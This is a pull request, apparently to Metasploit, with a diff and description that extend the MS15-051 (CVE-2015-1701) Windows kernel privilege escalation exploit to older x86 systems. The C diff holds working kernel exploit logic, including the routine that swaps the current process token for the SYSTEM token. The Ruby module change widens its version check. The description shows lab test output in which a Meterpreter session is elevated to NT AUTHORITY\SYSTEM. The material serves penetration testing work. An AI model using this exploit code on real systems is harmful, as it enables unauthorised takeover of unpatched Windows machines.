### PR TITLE
Support Older x86 Targets for MS15-051

### DIFF
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -35,7 +35,14 @@
 #define HMUNIQSHIFT 16
 
 typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
-typedef NTSTATUS (NTAPI *pPLPBPI)(HANDLE ProcessId, PVOID *Process);
+typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
+	IN   HANDLE ProcessId,
+	OUT  PVOID Process
+);
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
 
 typedef PVOID	PHEAD;
 
@@ -65,18 +72,12 @@ typedef struct _SHAREDINFO {
 
 static const TCHAR	MAINWINDOWCLASSNAME[] = TEXT("usercls348_Mainwindow");
 
-pPLPBPI						g_PsLookupProcessByProcessIdPtr = NULL;
+lPsLookupProcessByProcessId g_pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken    g_pPsReferencePrimaryToken = NULL;
 pUser32_ClientCopyImage		g_originalCCI = NULL;
 PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
 int							g_shellCalled = 0;
 DWORD						g_OurPID;
-
-
-typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
-	_Inout_  PVOID Process
-);
-
-lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
 
 typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );
 
@@ -230,17 +231,7 @@ BOOLEAN supIsProcess32bit(
 	return FALSE;
 }
 
-/*
-* GetPsLookupProcessByProcessId
-*
-* Purpose:
-*
-* Return address of PsLookupProcessByProcessId routine to be used next by shellcode.
-*
-*/
-ULONG_PTR GetPsLookupProcessByProcessId(
-	VOID
-	)
+BOOL GetShellCodeFunctions(VOID)
 {
 	BOOL						cond = FALSE;
 	ULONG						rl = 0;
@@ -248,7 +239,7 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 	ULONG_PTR					KernelBase = 0L, FuncAddress = 0L;
 	PRTL_PROCESS_MODULES		miSpace = NULL;
 	CHAR						KernelFullPathName[MAX_PATH * 2];
-
+	BOOL                        bSuccess = FALSE;
 
 	do {
 
@@ -278,12 +269,12 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 			break;
 		}
 
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
-
 		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
-		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
+		g_pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
 
+		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
+		g_pPsReferencePrimaryToken = (lPsReferencePrimaryToken)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
+		bSuccess = TRUE;
 	} while (cond);
 
 	if (MappedKernel != NULL) {
@@ -293,7 +284,39 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 		HeapFree(GetProcessHeap(), 0, miSpace);
 	}
 
-	return FuncAddress;
+	return bSuccess;
+}
+
+PSHAREDINFO GetSharedInfo(VOID) {
+	HMODULE	huser32;
+	PSHAREDINFO pSharedInfo = NULL;
+	DWORD dwCursor = 0;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return pSharedInfo;
+
+	pSharedInfo = (PSHAREDINFO)GetProcAddress(huser32, TEXT("gSharedInfo"));
+
+#ifndef _M_X64
+	PVOID pUser32InitializeImmEntryTable;
+
+	/* user32!gSharedInfo resoultion for x86 systems < Windows 7 */
+	if (pSharedInfo != NULL)
+		return pSharedInfo;
+
+	pUser32InitializeImmEntryTable = GetProcAddress(huser32, TEXT("User32InitializeImmEntryTable"));
+
+	for (dwCursor = 0; dwCursor < 0x80; dwCursor++) {
+		if ( *((PBYTE)pUser32InitializeImmEntryTable + dwCursor) != 0x50 )
+			continue;
+		if (*((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 1) != 0x68)
+			continue;
+		return *((PSHAREDINFO *)((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 2));
+	}
+#endif
+
+	return pSharedInfo;
 }
 
 /*
@@ -304,28 +327,22 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 * Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
 *
 */
-HWND GetFirstThreadHWND(
-	VOID
-	)
+HWND GetFirstThreadHWND(VOID)
 {
 	PSHAREDINFO		pse;
-	HMODULE			huser32;
 	PHANDLEENTRY	List;
 	ULONG_PTR		c, k;
 
-	huser32 = GetModuleHandle(TEXT("user32.dll"));
-	if (huser32 == NULL)
+	pse = GetSharedInfo();
+	if (pse == NULL) {
 		return 0;
-
-	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
-	if (pse == NULL)
-		return 0;
+	}
 
 	List = pse->aheList;
 	k = pse->psi->cHandleEntries;
 
-	if (pse->HeEntrySize != sizeof(HANDLEENTRY))
-		return 0;
+	//if (pse->HeEntrySize != sizeof(HANDLEENTRY))
+		//return 0;
 
 	//
 	// Locate, convert and return hwnd for current thread.
@@ -334,12 +351,11 @@ HWND GetFirstThreadHWND(
 		if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) {
 			return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT));
 		}
-
 	return 0;
 }
 
 // Search the specified data structure for a member with CurrentValue.
-BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+BOOL FindAndReplaceMember(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
 {
 	DWORD_PTR dwIndex, dwMask;
 
@@ -376,29 +392,25 @@ BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, 
 * Copy system token to current process object.
 *
 */
-NTSTATUS NTAPI StealProcessToken(
-	VOID
-	)
+NTSTATUS NTAPI StealProcessToken(VOID)
 {
-	NTSTATUS Status;
-	PVOID CurrentProcess = NULL;
-	PVOID SystemProcess = NULL;
+	void *pMyProcessInfo = NULL;
+	void *pSystemInfo = NULL;
+	PACCESS_TOKEN systemToken;
+	PACCESS_TOKEN targetToken;
 
-	Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess);
-	if (NT_SUCCESS(Status)) {
-		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
-		if (NT_SUCCESS(Status)) {
-			PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
-			PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
+	g_pPsLookupProcessByProcessId((HANDLE)g_OurPID, &pMyProcessInfo);
+	g_pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
 
-			// Find the token in the target process, and replace with the system token.
-			find_and_replace_member((PDWORD_PTR)CurrentProcess,
-				(DWORD_PTR)targetToken,
-				(DWORD_PTR)systemToken,
-				0x200);
-		}
-	}
-	return Status;
+	targetToken = g_pPsReferencePrimaryToken(pMyProcessInfo);
+	systemToken = g_pPsReferencePrimaryToken(pSystemInfo);
+
+	// Find the token in the target process, and replace with the system token.
+	FindAndReplaceMember((PDWORD_PTR)pMyProcessInfo,
+		(DWORD_PTR)targetToken,
+		(DWORD_PTR)systemToken,
+		0x200);
+	return 0;
 }
 
 
@@ -476,9 +488,9 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	}
 
 	g_OurPID = GetCurrentProcessId();
-	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
+	GetShellCodeFunctions();
 
-	if (g_PsLookupProcessByProcessIdPtr == NULL) {
+	if (g_pPsLookupProcessByProcessId == NULL) {
 		return;
 	}
 

--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -26,9 +26,10 @@ class Metasploit3 < Msf::Exploit::Local
       },
       'License'         => MSF_LICENSE,
       'Author'          => [
-          'Unknown',    # vulnerability discovery and exploit in the wild
-          'hfirefox',   # Code released on github
-          'OJ Reeves'   # msf module
+          'Unknown',         # vulnerability discovery and exploit in the wild
+          'hfirefox',        # Code released on github
+          'OJ Reeves',       # msf module
+          'Spencer McIntyre' # msf module
         ],
       'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
       'Platform'        => 'win',
@@ -57,10 +58,15 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
+    # Windows XP SP3 (32-bit)                      5.1.2600.6514 (Works)
+    # Windows Server 2003 Standard SP2 (32-bit)    5.2.3790.5445 (Works)
     # Windows Server 2008 Enterprise SP2 (32-bit)  6.0.6002.18005 (Does not work)
-    # Winodws 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (64-bit)                       6.1.7601.17535 (Works)
     # Windows 7 SP1 (32-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (32-bit)                       6.1.7601.18388 (Works)
     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
+    # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.18105 (Works)
 
     if sysinfo['OS'] !~ /windows/i
       return Exploit::CheckCode::Unknown
@@ -76,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
-    return Exploit::CheckCode::Safe if build == 7601
+    return Exploit::CheckCode::Safe if build > 7601
 
     return Exploit::CheckCode::Detected
   end
@@ -86,7 +92,8 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+    check_result = check
+    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
       fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 


### PR DESCRIPTION
This makes some changes to the `ms15_051_client_copy_image` exploit to support additional targets. The shellcode uses the find and replace method to avoid needing a static offset and x86 targets where the `user32!gSharedInfo` symbol can't be resolved will attempt to pull it out of the `user32!User32InitializeImmEntryTable` function.

Targets I tested it on include:
- Windows XP SP3 (32-bit) 5.1.2600.6514 (Works)
- Windows Server 2003 Standard SP2 (32-bit) 5.2.3790.5445 (Works)
- Windows 7 SP1 (64-bit) 6.1.7601.17535 (Works)
- Windows 7 SP1 (32-bit) 6.1.7601.18388 (Works)
- Windows Server 2008 R2 (64-bit) SP1 6.1.7601.18105 (Works)

One target I did not have access to test that would be great if someone else could try is Server 2008 Enterprise SP2 (32-bit), it was marked as not working previously but it may have more luck now.

Testing steps:
- [x] Test on a system which previously did not work (XP or 2003)
- [x] Ensure pre-existing targets continue to work correctly (Windows 7 / Server 2008 x64)
- [x] Rebuild the new binaries for the merge (I didn't include them)

Output from testing on Windows XP SP3:

```
msf-git (S:2 J:1) exploit(ms15_051_client_copy_image) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : NOOB-07797B4D0D
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NOOB-07797B4D0D\n00b
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > background 
[*] Backgrounding session 5...
msf-git (S:2 J:1) exploit(ms15_051_client_copy_image) > exploit

[*] [2015.06.24-08:47:14] win32k.sys file version: 5.1.2600.6514 branch: 65
[*] [2015.06.24-08:47:14] Launching notepad to host the exploit...
[+] [2015.06.24-08:47:15] Process 1192 launched.
[*] [2015.06.24-08:47:15] Reflectively injecting the exploit DLL into 1192...
[*] [2015.06.24-08:47:15] Injecting exploit into 1192...
[*] [2015.06.24-08:47:15] Exploit injected. Injecting payload into 1192...
[*] [2015.06.24-08:47:16] Payload injected. Executing exploit...
[*] [2015.06.24-08:47:16] Sending stage (884270 bytes) to 192.168.90.178
[+] [2015.06.24-08:47:16] Exploit finished, wait for (hopefully privileged) payload execution to complete.
msf-git (S:2 J:1) exploit(ms15_051_client_copy_image) > [*] Meterpreter session 6 opened (192.168.90.1:4444 -> 192.168.90.178:1034) at 2015-06-24 08:47:17 -0400

msf-git (S:3 J:1) exploit(ms15_051_client_copy_image) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer        : NOOB-07797B4D0D
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

Thanks!
